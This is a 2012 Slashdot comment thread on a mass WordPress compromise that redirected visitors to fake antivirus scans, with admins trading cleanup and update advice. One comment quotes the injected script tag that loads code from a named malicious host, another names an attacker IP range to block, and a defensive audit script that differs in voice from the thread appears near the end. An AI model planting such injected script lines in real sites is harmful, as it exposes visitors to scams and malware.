Security News

30K WordPress Blogs Infected With the Latest Malware Scam

Posted by Unknown Lamer
from the check-your-versions dept.
alphadogg writes with an excerpt from an article over at Network World: "Almost 30,000 WordPress blogs have been infected in a new wave of attacks orchestrated by a cybercriminal gang whose primary goal is to distribute rogue antivirus software, researchers from security firm Websense say. The attacks have resulted in over 200,000 infected pages that redirect users to websites displaying fake antivirus scans. The latest compromises are part of a rogue antivirus distribution campaign that has been going on for months, the Websense researchers said."
  • McAfee? (Score:5, Funny)

    by Oswald McWeany (2428506) on Wednesday March 07, 2012 @12:00PM (#39275373)

    websites displaying fake antivirus scans

    I didn't know McAfee had started targeting Web blogs now.

    • Re:McAfee? (Score:4, Informative)

      by tepples (727027) <tepples AT gmail DOT com> on Wednesday March 07, 2012 @12:02PM (#39275389) Homepage Journal
      It might be hard to believe, but there are antivirus companies even less scrupulous than McAfee and Norton. Wikipedia explains [wikipedia.org].
      • by Ihmhi (1206036)

        Selectively disabling parts of the system to prevent the user from uninstalling the malware. Some may also prevent anti-malware programs from running, disable automatic system software updates and block access to websites of anti-malware vendors.

        I dunno, sounds like Norton to me.

        • At least Norton tries to provide a working removal tool [symantec.com] at no charge. The only problem I've found is that it's made deliberately inaccessible to blind users (with a CAPTCHA) so that malware doesn't automatically run it on every computer that it tries to infect.
        • by hairyfeet (841228)

          Oh Lord, please don't say that name! Poor Jim is still rocking himself in the corner going "It just won't uninstall! Why won't it uninstall? It just won't go away" after the last wave of Norton infected laptops came through and we have finally got his mumbling quieted down, please don't give Jim a flashback!

          As for TFA this is why I recommend the combo of Win 7 with either Avast or Comodo IS along with Comodo Dragon with ABP. Windows 7 has DEP and ASLR along with UAC and Comodo Dragon is able to take advanta

  • Analysis (Score:4, Insightful)

    by SirDice (1548907) on Wednesday March 07, 2012 @12:07PM (#39275443)
    Why do they always focus on the crap that's left behind when they analyse these things? I want to know how they managed to get that stuff on those servers so I can check my own. Was it an old and vulnerable WordPress or was it some 0-day they used? For some reason they always focus on the effects and not on the causes.
  • Is it just a popularity/contrast thing, or does wordpress seem to be popping up a lot recently for security holes in their web servers?

    • by Spad (470073)

      At a guess, the ratio of Installs to Unpatched/Insecure Installs, both of the core WP software and its many, many 3rd party plugins and themes.

      A *lot* of sites are either running old versions of software or have plugins/themes with gaping vulnerabilities that are no longer under active development.

      • Re:wordpress, again? (Score:5, Interesting)

        by gmack (197796) <gmack@in n e rfire.net> on Wednesday March 07, 2012 @12:24PM (#39275647) Homepage Journal

        Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

        • by Anonymous Coward

          Set up WP MultiSite, update one site and one set of plugins and be done with it - easy as that...

        • Re:wordpress, again? (Score:4, Informative)

          by nick.sideras (836787) on Wednesday March 07, 2012 @12:41PM (#39275879)

          Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

          This drove me nuts at my current job for about 2 months - you need Wordpress Network [wordpress.org].

          There's the easy way and the hard(er) way to do this:

          This [wordpress.org] is the official easy way, but it's never worked for me (last tried in Spring of 2011). The nice thing is that it's all stuff built into WordPress, so you should be able to do it without any problems. I'd say it's probably worth giving this a try with one site, and if it works, run with it.

          This [bavatuesdays.com] is more down and dirty way that will definitely work, and is more or less how I did it. A little SQL editing never hurt anyone.
          Also, this [sillybean.net] is a great companion to the bavatuesdays link. He goes on about his DNS in the first few paragraphs, but the second half of that post has some good details about where files need to be, and how links and such need to be updated.

          Once you have a network, you have a fantastic "Update Network [wordpress.org]" button. Boom. Take the rest of the day off.

        • Agreed! At least you only have 15, I've just been given the task of managing our Wordpress implementation, we're at 144. *Ugh*
        • by Anonymus (2267354)

          WordPress is extremely easy and quick to update. You can click a single button and update every single plugin and theme, or another button to update core. That's it. If you're upgrading by manually uploading files to a bunch of different servers for some reason, you should at least look into something like updating with Subversion [wordpress.org] or using multisite and just updating once for every site.

        • by Hatta (162192)

          You can't automatically log into a website and click a link with a very small shell script?

        • Seriously? It's a hassle to have to log into each server and click a link?

          You must never have run Gentoo*...

          *Which is still my favorite distro, despite occasionally being a real PITA to update.
          • by gmack (197796)

            I used to love hand compiling everything but then I got my first full time sysadmin job. The job came with 20 servers and thankfully 15 of them ran Debian. When you have to do something repeatedly it gets old quickly so now I want the OS to do as much as possible and script most of the rest.

            • LOL. I've been a full time sys admin for ten years -- first with Solaris and FreeBSD servers, then in my current job with about 15 or so Gentoo (!) servers plus my laptop and a desktop. We migrated to Ubuntu about three years ago. In all honesty, we do a much better job of updating the Ubuntu servers than we did the Gentoo servers because it is so much easier to do, but I am starting to loathe my Ubuntu laptop. It's a lot easier to get wireless working in Ubuntu than Gentoo, but Unity, nVidia drivers*,
              • by gmack (197796)

                I gave up on the new Ubuntu pretty quickly while installing a friend's notebook last month and ended up installing debian + xfce + wicd. No complaints from him at all.

                For servers, it's hard to beat debian + dotdeb repo.

        • by mattrad (78969)

          Well my clicking-averse friend, you need managewp.com. One login and a click or two, and you've updated all those 15 installs. Either that or migrate everything to multisite (Backup Buddy is great for that).

        • You mean "the fact that I have failed to write a working update/deployment script is annoying"? Come on - it's not that hard. Just rsync anything but wp-content. Make sure they all have the same plugins installed but not necessarily activated and sync the plugins folder, too. That's for starters. The elegant way involves delivering images and "uploads" from a CDN and simply unpacking the new versions over the old ones by rsync, ftp or wget...
    • by Anonymus (2267354)

      I personally think it's mostly a popularity thing, since WordPress pretty much owns the blog market. I think the other problem, however, is just with how simple they've made it to accidentally backdoor your site. There are thousands of plugins for WordPress, installable with just a couple of clicks, written by people who know nothing about security, or have possibly even maliciously left holes in their plugin. Unlike large projects that are generally maintained and reviewed by dozens of people, a plugin

  • by dgharmon (2564621) on Wednesday March 07, 2012 @12:13PM (#39275529) Homepage
    "The Websense ThreatSeeker Network has detected a new wave of mass-injections [websense.com] of a well-known rogue antivirus campaign"

    How exactly are these sites infected in the first place?

    "The page looks like a Windows Explorer [websense.com] window with a "Windows Security Alert" dialogue box in it"

    Ahh so - nothing to read here ... moving on ...
    • by Pope (17780)

      I used to get those all the time on my Mac and just laugh. Then they made a special OS X-looking one.

    • by Rick17JJ (744063)

      A number of years ago, I encountered a fake Microsoft security warning while using my Linux computer. It said that Microsoft had detected viruses and spyware on my computer. This was on a Linux computer that did not have any Microsoft products installed on it.

      It offered to do a free online scan of my hard drive. Despite clicking on No, a progress bar appeared as it started to do a fake scan of my hard drive. After about 60 seconds, it said that it had finished scanning my drive C. It then said that several

    • by klui (457783)
      So looks like the injected code
      </DIV> <!-- END body-wrapper -->
      <script src="http://ionis90landsi.rr.ru/mm.php?=1"></script>
      </BODY>
      </HTML>

      would be taken care of with NoScript as long as your white list is short and doesn't contain rr.nu in this example.
  • by Dynamoo (527749) on Wednesday March 07, 2012 @12:14PM (#39275539) Homepage
    It looks like the first step in the infection is via an IP (194.28.114.103) belonging to Specialist ISP of Transnistria [wikipedia.org]. That has featured before on Slashdot in this story [slashdot.org].

    The block 194.28.112.0/22 is simply all evil (I've documented it here [dynamoo.com] in the past), there's no reason to send traffic to it at all, blocking it is a good option.

    • by gaspyy (514539)

      Transnistria is basically a haven for organized crime. A "republic" with virtually no international recognition, a very small economy and ties with international arms dealers.

      • by Dynamoo (527749)
        Exactly. It's a country that doesn't exist in the eyes of most other countries, which makes it beyond the reach of international law enforcement. There are other countries in the world like that, the difference with Transnistria is that it has a somewhat modern infrastructure.
  • by Opportunist (166417) on Wednesday March 07, 2012 @12:17PM (#39275557)

    Why bother using 0day exploits and payload droppers when the best infector is sitting right in front of the PC?

  • Anyone else continuing to have a problem when you type your password that it shows instead of ******? My password is ilikegirrlz See, it did it again!
    • by Anonymous Coward

      Hunter2
       
      Now get off my lawn!

  • by dgrotto (2588895) on Wednesday March 07, 2012 @01:45PM (#39276675)

    Most of my WP installs were infected because I am a slack ass. Here are the high level steps I took to solve the problem:

    • 1) Backup sites.
    • 2) Fix all world-writable directories in your WP install (what the hell WP?!). This seems to be the primary vector for getting in.
    • 3) Clean up infected PHP files with this script from php-beginners.com [php-beginners.com]. Thank you Paolo.
    • 4) Inspect all .htaccess configs for errant redirects and fix.
    • 5) Install and run the timthumb vulnerability scanner [wordpress.org]. Possible secondary vector. Thank you Peter Butler!
    • 6) Update your WP install to latest and greatest.
    • 7) Remove any unused plugins and themes.
    • 8) Backup sites.

    I may be missing something - again, I'm a slackass. Anyone else have other advice for our admin-challenged friends besides "get a real software package"?

    By the way, I was trying to lock down one of my WP installs to only allow authed users access to posts. However, WP does not put the assets for posts - usually in wp-content/uploads - behind the auth wall. It's just out there for the whole world to see. It was a simple fix to rewrite the .htaccess config for this directory to redirect to an auth script, but it still shocks me how insecure this app is.

    • by dgrotto (2588895)

      Forgot one thing:

      The hack puts a list of sites to redirect to in a .logs directory. rm these.
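A read-only audit that walks a WordPress install tree for the artifacts named in the checklist above and its follow-up (world-writable directories, an injected remote script tag like the one klui quoted, external redirects in .htaccess, and the .logs directory), written as an added example rather than dgrotto's or the php-beginners.com script; the sample tree and the example.invalid host are constructed so it runs offline.

```shell
#!/bin/sh
# Added example, not from the thread: report the artifacts dgrotto's checklist
# looks for in a WordPress tree. It only reports; chmod/rm/restore is the admin's call.
set -u

# Step 2: world-writable directories (-perm -002 is the POSIX spelling of o+w).
count_world_writable() {
    find "$1" -type d -perm -002 | wc -l | tr -d ' '
}

# PHP/HTML files carrying an injected remote <script> tag ending in /mm.php,
# the shape klui quoted. Prints the matching file paths, one per line.
list_injected_scripts() {
    find "$1" -type f \( -name '*.php' -o -name '*.html' \) \
        -exec grep -lE '<script src="https?://[^"]*/mm\.php' {} + 2>/dev/null
}

# Follow-up comment: the .logs directories holding the redirect target list.
count_logs_dirs() {
    find "$1" -type d -name '.logs' | wc -l | tr -d ' '
}

# Step 4: .htaccess files whose Redirect/RewriteRule points at an external host.
list_external_redirects() {
    find "$1" -type f -name '.htaccess' \
        -exec grep -lE '^(Redirect|RewriteRule)[[:space:]].*https?://' {} + 2>/dev/null
}

# Constructed sample tree (example.invalid is a placeholder, not a real indicator).
SAMPLE=$(mktemp -d)
mkdir -p "$SAMPLE/wp-content/uploads" "$SAMPLE/wp-content/.logs" "$SAMPLE/wp-includes"
chmod 0755 "$SAMPLE/wp-content" "$SAMPLE/wp-content/.logs" "$SAMPLE/wp-includes"
chmod 0777 "$SAMPLE/wp-content/uploads"          # the one world-writable directory
printf '<?php echo 1; ?>\n</BODY>\n</HTML>\n' > "$SAMPLE/wp-includes/clean.php"
printf '</DIV>\n<script src="http://example.invalid/mm.php?=1"></script>\n</BODY>\n' \
    > "$SAMPLE/wp-includes/footer.php"
printf 'Redirect 301 / http://example.invalid/landing\n' > "$SAMPLE/.htaccess"
printf 'RewriteRule ^index\\.php$ - [L]\n' > "$SAMPLE/wp-content/.htaccess"

echo "world-writable dirs: $(count_world_writable "$SAMPLE")"
echo "injected scripts:    $(list_injected_scripts "$SAMPLE" | wc -l | tr -d ' ')"
echo ".logs dirs:          $(count_logs_dirs "$SAMPLE")"
echo "external redirects:  $(list_external_redirects "$SAMPLE" | wc -l | tr -d ' ')"
```

Point the four functions at a real document root instead of $SAMPLE to audit an install; anything reported should be compared against a known-good backup before being changed.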

  • by ThatsNotPudding (1045640) on Wednesday March 07, 2012 @02:27PM (#39277193)
    BTW: why is Adobe allowed to - by default - check the box on their flash updates to also install Norton on the victims computer? How many trusting civilians (think: grandmothers) end up with borked computers with conflicting AV programs solely due to corporate greed? I'm willing to bet this check box (if it even appears) is NOT checked by default in the EU market. Man, I miss government FOR the people...
  • And I was looking for a blog hoster this week, and specifically at WordPress. Anyone got a list of free blog hosters (moving away from blogspot)?

  • Any idea which versions of Wordpress is being targeted and/or which vulnerability? The quoted articles look more like commercials for Websense.
